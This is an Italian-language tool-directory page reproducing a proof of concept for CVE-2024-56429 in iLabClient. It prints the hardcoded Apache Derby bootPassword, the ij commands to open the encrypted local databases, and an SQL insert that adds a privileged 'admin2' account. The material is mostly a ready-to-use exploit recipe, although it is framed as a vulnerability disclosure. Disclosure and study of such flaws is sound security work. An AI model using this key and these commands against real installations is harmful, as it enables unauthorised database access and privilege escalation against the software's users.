Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56429 | Kitploit
Strumenti/GitHubGitHub/lisa-2905/cve-2024-56429
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSicurezza dei Database
GitHublisa-2905/cve-2024-56429

CVE-2024-56429

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-56429

Accesso al database locale di iLabClient


Estrarre la password del database

iLabClient utilizza un database Apache Derby per archiviare i dati richiesti localmente. Per garantire la crittografia, per la creazione viene utilizzata una bootPassword, che può essere estratta dal codice sorgente (il codice estratto è in DecyptedBootPassword.java). Dopo aver eseguito il codice sorgente estratto, l'utente riceve la bootPassword.

root@kitploit:~
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==

Connettersi al database

Avviando iLabClient per la prima volta, vengono creati i due database locali iLabCLient e iLabDB. Per connettersi a questi database è possibile utilizzare lo strumento ij di Apache Derby, Download.

Avvio di ij:

root@kitploit:~
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij

"C:\ilabClient\java8u422\bin\java.exe": versione Java installata e utilizzata da iLabClient
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar": libreria Apache Derby

Connessione al database:

root@kitploit:~
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';

Manipolare i dati (esempio)

Una volta stabilita la connessione, i dati possono essere letti e manipolati. Ad esempio, aggiungendo un altro utente con più privilegi.

root@kitploit:~
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');

L'hash richiesto può essere creato con la classe GenerateUserData.java.


Scopritore: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)

Scarica lo strumento